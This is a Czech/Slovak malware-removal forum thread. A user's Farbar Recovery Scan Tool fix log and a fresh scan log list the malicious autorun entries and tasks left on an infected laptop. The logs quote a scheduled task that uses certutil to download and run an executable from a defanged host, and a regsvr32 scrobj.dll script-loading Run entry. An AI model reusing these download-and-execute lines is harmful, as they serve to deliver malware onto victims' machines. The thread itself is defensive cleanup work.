Task: {7A8AAB71-2022-4B97-BAD3-0F4BDE6BE93F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-08] (Google Inc -> Google Inc.)
Task: {88922F55-054D-481C-A0F4-E8FDE5EB7BE1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-08] (Google Inc -> Google Inc.)
Task: {CD205B13-8D32-484A-BEBD-62B65E110D89} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5223936 2019-06-10] () [File not signed] <==== ATTENTION
SearchScopes: HKU\S-1-5-21-1314756099-2751335980-7412341-1001 -> DefaultScope {509C9FF2-F2FF-4176-9A16-1D036D6A1AF4} URL =
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.17.2.46\Exts\Chrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.17.2.46\Exts\Chrome.crx <not found>
S2 tijmjrmm; C:\WINDOWS\SysWOW64\tijmjrmm\mcibckaj.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
C:\ProgramData\{F9EDCDAB-B9A4-DEF1-DCA4-7252DC432B03}
C:\ProgramData\{A55344D9-30D6-824F-AE2D-CC0EAECA955F}
C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw
C:\Program Files\HIXKNY8VO4
C:\Program Files (x86)\EatPizza
C:\WINDOWS\System32\Tasks\csrss
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
C:\Users\TATTOO NR\AppData\Roaming\arcuafh
C:\Users\TATTOO NR\AppData\Roaming\wvteeus
C:\WINDOWS\SysWOW64\tijmjrmm
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
C:\Users\TATTOO NR\AppData\Local\App\svchost.exe
C:\Users\TATTOO NR\AppData\Local\Temp

EmptyTemp:
Hosts:
End
Uložte do C:\Users\TATTOO NR\Downloads jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

kultivate
Návštěvník
Návštěvník
Příspěvky: 4
Registrován: 10 čer 2019 15:53

Re: Otvaranie nahodnych stranok na internete, pomaly pocitat

#7 Příspěvek od kultivate »

EDIT - Zaroven vyskocili 3 errory a ten 3. s cmd nejde zavriet aj ked kilam OK https://imgur.com/a/rI8Xres

Po fixe a restarte sa stale otvara sam od seba chrome s nahodnymi webstrankami, pridal rovno aj novy FRST log po aplikovani fixu ak je potreba

Fix result of Farbar Recovery Scan Tool (x64) Version: 10-06-2019 01
Ran by TATTOO NR (11-06-2019 11:11:40) Run:1
Running from C:\Users\TATTOO NR\Downloads
Loaded Profiles: TATTOO NR (Available Profiles: TATTOO NR)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
C:\Users\TATTOO NR\AppData\Local\Temp\is-9H4DE.tmp\Boutixc.exe
C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw\xjmcc2x5pii.exe
C:\Users\TATTOO NR\AppData\Local\App\svchost.exe
C:\Users\TATTOO NR\AppData\Local\Temp\is-67RHR.tmp\xjmcc2x5pii.tmp
C:\Users\TATTOO NR\AppData\Local\Temp\is-LAKTE.tmp\Boutixc.tmp
C:\Windows\rss\csrss.exe
C:\Windows\windefender.exe
C:\Users\TATTOO NR\AppData\Local\Temp\csrss\cloudnet.exe
C:\Program Files\HIXKNY8VO4
HKLM\...\RunOnce: [4lmgurqpczt] => C:\Program Files (x86)\EatPizza\616386955.exe [678400 2019-06-10] () [File not signed]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [App] => C:\Users\TATTOO NR\AppData\Local\App\svchost.exe [589824 2019-06-10] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [LingeringViolet] => C:\WINDOWS\rss\csrss.exe [5223936 2019-06-10] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [7018735] => C:\Users\TATTOO NR\AppData\Local\Temp\is-9H4DE.tmp\Boutixc.exe [3524063 2019-06-10] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [0BIHA30U5ZHWRH1] => C:\Program Files\HIXKNY8VO4\HIXKNY8VO.exe [1050112 2019-06-10] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [9887864] => C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw\xjmcc2x5pii.exe [2384286 2019-06-10] ( ) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [CloudNet] => C:\Users\TATTOO NR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-06-10] (EpicNet Inc.) [File not signed] <==== ATTENTION
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {716CF578-7C14-401E-8B7B-DAD60658B36B} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nevernews.club/app/app.exe C:\Users\TATTOO NR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\TATTOO NR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {7A8AAB71-2022-4B97-BAD3-0F4BDE6BE93F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-08] (Google Inc -> Google Inc.)
Task: {88922F55-054D-481C-A0F4-E8FDE5EB7BE1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-08] (Google Inc -> Google Inc.)
Task: {CD205B13-8D32-484A-BEBD-62B65E110D89} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5223936 2019-06-10] () [File not signed] <==== ATTENTION
SearchScopes: HKU\S-1-5-21-1314756099-2751335980-7412341-1001 -> DefaultScope {509C9FF2-F2FF-4176-9A16-1D036D6A1AF4} URL =
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.17.2.46\Exts\Chrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton Security\Engine\22.17.2.46\Exts\Chrome.crx <not found>
S2 tijmjrmm; C:\WINDOWS\SysWOW64\tijmjrmm\mcibckaj.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
C:\ProgramData\{F9EDCDAB-B9A4-DEF1-DCA4-7252DC432B03}
C:\ProgramData\{A55344D9-30D6-824F-AE2D-CC0EAECA955F}
C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw
C:\Program Files\HIXKNY8VO4
C:\Program Files (x86)\EatPizza
C:\WINDOWS\System32\Tasks\csrss
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
C:\Users\TATTOO NR\AppData\Roaming\arcuafh
C:\Users\TATTOO NR\AppData\Roaming\wvteeus
C:\WINDOWS\SysWOW64\tijmjrmm
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
C:\Users\TATTOO NR\AppData\Local\App\svchost.exe
C:\Users\TATTOO NR\AppData\Local\Temp

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
"C:\Users\TATTOO NR\AppData\Local\Temp\is-9H4DE.tmp\Boutixc.exe" => not found
"C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw\xjmcc2x5pii.exe" => not found
C:\Users\TATTOO NR\AppData\Local\App\svchost.exe => moved successfully
"C:\Users\TATTOO NR\AppData\Local\Temp\is-67RHR.tmp\xjmcc2x5pii.tmp" => not found
"C:\Users\TATTOO NR\AppData\Local\Temp\is-LAKTE.tmp\Boutixc.tmp" => not found
C:\Windows\rss\csrss.exe => moved successfully
C:\Windows\windefender.exe => moved successfully
C:\Users\TATTOO NR\AppData\Local\Temp\csrss\cloudnet.exe => moved successfully
C:\Program Files\HIXKNY8VO4 => moved successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\4lmgurqpczt" => not found
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
"HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Windows\CurrentVersion\Run\\App" => removed successfully
"HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Windows\CurrentVersion\Run\\LingeringViolet" => removed successfully
"HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Windows\CurrentVersion\Run\\7018735" => removed successfully
"HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Windows\CurrentVersion\Run\\0BIHA30U5ZHWRH1" => removed successfully
"HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Windows\CurrentVersion\Run\\9887864" => removed successfully
"HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
HKLM\SOFTWARE\Policies\Google => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{716CF578-7C14-401E-8B7B-DAD60658B36B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{716CF578-7C14-401E-8B7B-DAD60658B36B}" => removed successfully
C:\WINDOWS\System32\Tasks\ScheduledUpdate => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7A8AAB71-2022-4B97-BAD3-0F4BDE6BE93F}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A8AAB71-2022-4B97-BAD3-0F4BDE6BE93F}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{88922F55-054D-481C-A0F4-E8FDE5EB7BE1}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88922F55-054D-481C-A0F4-E8FDE5EB7BE1}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CD205B13-8D32-484A-BEBD-62B65E110D89}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD205B13-8D32-484A-BEBD-62B65E110D89}" => removed successfully
C:\WINDOWS\System32\Tasks\csrss => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => removed successfully
"HKU\S-1-5-21-1314756099-2751335980-7412341-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
HKLM\SOFTWARE\Google\Chrome\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe => removed successfully
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe => removed successfully
"HKLM\System\CurrentControlSet\Services\tijmjrmm" => removed successfully
tijmjrmm => service removed successfully
C:\ProgramData\{F9EDCDAB-B9A4-DEF1-DCA4-7252DC432B03} => moved successfully
C:\ProgramData\{A55344D9-30D6-824F-AE2D-CC0EAECA955F} => moved successfully
C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw => moved successfully
"C:\Program Files\HIXKNY8VO4" => not found
C:\Program Files (x86)\EatPizza => moved successfully
"C:\WINDOWS\System32\Tasks\csrss" => not found
"C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA" => not found
"C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore" => not found
C:\Users\TATTOO NR\AppData\Roaming\arcuafh => moved successfully
Could not move "C:\Users\TATTOO NR\AppData\Roaming\wvteeus" => Scheduled to move on reboot.
C:\WINDOWS\SysWOW64\tijmjrmm => moved successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive7 => removed successfully
HKLM\Software\Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => not found
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive7 => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => not found
"C:\Users\TATTOO NR\AppData\Local\App\svchost.exe" => not found

"C:\Users\TATTOO NR\AppData\Local\Temp" folder move:

Could not move "C:\Users\TATTOO NR\AppData\Local\Temp" => Scheduled to move on reboot.

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 10772480 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 20117103 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 3149127 B
Edge => 1979695 B
Chrome => 1400854938 B
Firefox => 391703302 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 57986 B
LocalService => 0 B
NetworkService => 0 B
NetworkService => 0 B
TATTOO NR => 110750537 B

RecycleBin => 46846037 B
EmptyTemp: => 1.8 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 11-06-2019 11:18:55)

C:\Users\TATTOO NR\AppData\Roaming\wvteeus => Is moved successfully
C:\Users\TATTOO NR\AppData\Local\Temp => moved successfully

==== End of Fixlog 11:18:58 ====

=================

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10-06-2019 01
Ran by TATTOO NR (administrator) on LAPTOP-OQIQCPDD (Acer Nitro AN515-41) (11-06-2019 11:21:49)
Running from C:\Users\TATTOO NR\Downloads
Loaded Profiles: TATTOO NR (Available Profiles: TATTOO NR)
Platform: Windows 10 Home Version 1803 17134.765 (X64) Language: Angličtina (USA)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

( ) [File not signed] C:\Users\TATTOO NR\AppData\Roaming\cenu3qfhh2i\kvunkqrnqyw.exe
( ) [File not signed] C:\Users\TATTOO NR\AppData\Roaming\egl2ibdybza\yen41or4xyg.exe
( ) [File not signed] C:\Users\TATTOO NR\AppData\Roaming\f3lfxrjhn5p\ebmurowmij1.exe
( ) [File not signed] C:\Users\TATTOO NR\AppData\Roaming\fmh2w1v003l\ajdmpgbuw5y.exe
( ) [File not signed] C:\Users\TATTOO NR\AppData\Roaming\fplk3kdmigo\nxm2dx2tyvj.exe
( ) [File not signed] C:\Users\TATTOO NR\AppData\Roaming\p0uiw1bfrq3\4kunvqm1h30.exe
( ) [File not signed] C:\Users\TATTOO NR\AppData\Roaming\ybsdzcmsbo4\n4uwca0xije.exe
() [File not signed] C:\Program Files (x86)\GLPCCamera\monitorpad.exe
() [File not signed] C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe
() [File not signed] C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
() [File not signed] C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19031.11411.0_x64__8wekyb3d8bbwe\Video.UI.exe
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-26IU6.tmp\n4uwca0xije.tmp
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-5V65J.tmp\kvunkqrnqyw.tmp
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-9720G.tmp\yen41or4xyg.tmp
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-BH77D.tmp\nxm2dx2tyvj.tmp
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-JGEBL.tmp\4kunvqm1h30.tmp
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-KA1RD.tmp\ajdmpgbuw5y.tmp
() [File not signed] C:\Users\TATTOO NR\AppData\Local\Temp\is-V36VE.tmp\ebmurowmij1.tmp
() [File not signed] C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Helper.exe
() [File not signed] C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Helper.exe
() [File not signed] C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Helper.exe
() [File not signed] C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Helper.exe
() [File not signed] C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Helper.exe
() C:\Users\TATTOO NR\AppData\Roaming\Media\sys32.exe
(Acer Incorporated -> ) C:\OEM\Preload\FUBService\FUBService.exe
(Acer Incorporated -> Acer Cloud Technology) C:\Program Files\WindowsApps\AcerIncorporated.6245439DEEE9E_1.0.10.0_x86__48frkmn4z8aw4\abPhoto\acer\ccd.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atiesrxx.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ASUS) C:\ProgramData\AMDControlPanelClient\WimSCP.exe
(ASUSTek Computer Inc.) C:\ProgramData\AMDControlPanelClient\ATKPrwCtrl.exe
(Dassault Systemes SolidWorks Corp. -> Dassault Systèmes SolidWorks Corp.) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS\sldworks_fs.exe
(Di Wu -> Gromada.com) [File not signed] C:\ProgramData\IntelCore\ApplicationsFrameHost.exe
(Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
(G%W6R6E3) [File not signed] C:\Program Files\2O7KWFY5NN\2O7KWFY5N.exe
(G%W6R6E3) [File not signed] C:\Program Files\CZR35WZAYJ\POXIDW5BY.exe
(G%W6R6E3) [File not signed] C:\Program Files\E5F7Z22438\RUMM71852.exe
(G%W6R6E3) [File not signed] C:\Program Files\GQKYY7DDKJ\GQKYY7DDK.exe
(G%W6R6E3) [File not signed] C:\Program Files\KG0G00I0LP\KG0G00I0L.exe
(G%W6R6E3) [File not signed] C:\Program Files\MHWBGQ5L61\Z63QOPBM6.exe
(G%W6R6E3) [File not signed] C:\Program Files\X7PXPV31L9\X7PXPV31L.exe
(Google Inc -> Google Inc.) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
(Hot-World GmbH & Co. KG -> ) C:\Program Files (x86)\Repetier-Server\bin\RepetierServer.exe
(MEDIATEK INC. -> Mediatek Inc.) C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry.exe
(MEDIATEK INC. -> Mediatek Inc.) C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry64.exe
(Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\dispatcher.exe
(Mentor Graphics Corporation -> Mentor Graphics Corporation) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(Microsoft Azure) [File not signed] C:\ProgramData\IntelCore\xCoreManagment.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) [File not signed] C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20174.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wscript.exe
(Qualcomm Atheros -> Windows (R) Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Symantec Corporation -> Symantec Corporation) C:\Program Files\Norton Security\Engine\22.17.2.46\NortonSecurity.exe
(Symantec Corporation -> Symantec Corporation) C:\Program Files\Norton Security\Engine\22.17.2.46\NortonSecurity.exe
(Symantec Corporation -> Symantec Corporation) C:\Program Files\Norton Security\Engine\22.17.2.46\nsWscSvc.exe
(Xerox) [File not signed] C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmdb.exe
(Xerox) [File not signed] C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmpl.exe
(Zhuhai Kingsoft Office Software Co.,Ltd) [File not signed] C:\ProgramData\IntelCore\IntelConfigService.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18378208 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_ASC] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1489376 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_CTPreset] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1489376 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1489376 2017-05-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [PicstreamAgent] => C:\Program Files (x86)\Acer\AOP Framework\uwplauncher.exe [106712 2017-05-17] (Acer Incorporated -> )
HKLM\...\Run: [GLSystray] => C:\Program Files (x86)\GLPCCamera\monitorpad.exe [69632 2014-03-11] () [File not signed]
HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [849928 2016-09-19] (Dolby Laboratories, Inc. -> )
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM-x32\...\Run: [Launcher6020] => C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\Launcher\xrlaunch.exe [2619904 2014-05-05] (Xerox) [File not signed]
HKLM-x32\...\Run: [StatusAutoRun6020] => C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmpl.exe [4297728 2014-08-27] (Xerox) [File not signed]
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [AcerPortal] => C:\ProgramData\acer\Acer Portal\launchPortal.exe [25816 2017-05-17] (Acer Incorporated -> )
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [Zoner Photo Studio Autoupdate] => C:\PROGRAM FILES\ZONER\PHOTO STUDIO 17\Program32\ZPSTRAY.EXE [437248 2014-09-12] (ZONER software, a.s. -> ZONER software)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [18630056 2018-09-11] (Piriform Ltd -> Piriform Ltd)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [B761.tmp] => C:\Users\TATTOO NR\AppData\Local\SysDriver\B761.tmp.exe [80384 2019-06-10] (Borjoni CORP) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [ZedNo] => C:\Users\TATTOO NR\AppData\Local\SysDriver\ZedNo.exe [80384 2019-06-10] (GoToLife CORP) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [Windows Start-Up Application] => C:\ProgramData\WindowsTools\WindFlash.exe [0 0000-00-00] (Windows Corporation)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [AMD GPU Optimization] => C:\ProgramData\AMDTools\AsusHidSrv.exe [0 0000-00-00] (Windows Corporation)
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [X6VHUKHSYBHGTYC] => C:\Program Files\X7PXPV31L9\X7PXPV31L.exe [1050112 2019-06-11] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [9151964] => C:\Users\TATTOO NR\AppData\Roaming\cenu3qfhh2i\kvunkqrnqyw.exe [2384286 2019-06-11] ( ) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [c245de2950ce0e9438c29d9bc685b272] => regsvr32.exe /s /n /u /i:"C:\Users\TATTOO NR\AppData\Roaming\IBDT5U31NO6.txt" scrobj.dll. <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [4191918] => C:\Users\TATTOO NR\AppData\Roaming\fplk3kdmigo\nxm2dx2tyvj.exe [2384286 2019-06-11] ( ) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [JHGDUXGRJUZUICG] => C:\Program Files\E5F7Z22438\RUMM71852.exe [1050112 2019-06-11] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [BGVSX5NZU0PBZMJ] => C:\Program Files\MHWBGQ5L61\Z63QOPBM6.exe [1050112 2019-06-11] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [7728846] => C:\Users\TATTOO NR\AppData\Roaming\ybsdzcmsbo4\n4uwca0xije.exe [2384286 2019-06-11] ( ) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [7803313] => C:\Users\TATTOO NR\AppData\Roaming\egl2ibdybza\yen41or4xyg.exe [2384286 2019-06-11] ( ) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [UPZRGPO2RYDIOHX] => C:\Program Files\KG0G00I0LP\KG0G00I0L.exe [1050112 2019-06-11] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [5357303] => C:\Users\TATTOO NR\AppData\Roaming\fmh2w1v003l\ajdmpgbuw5y.exe [2384286 2019-06-11] ( ) [File not signed]
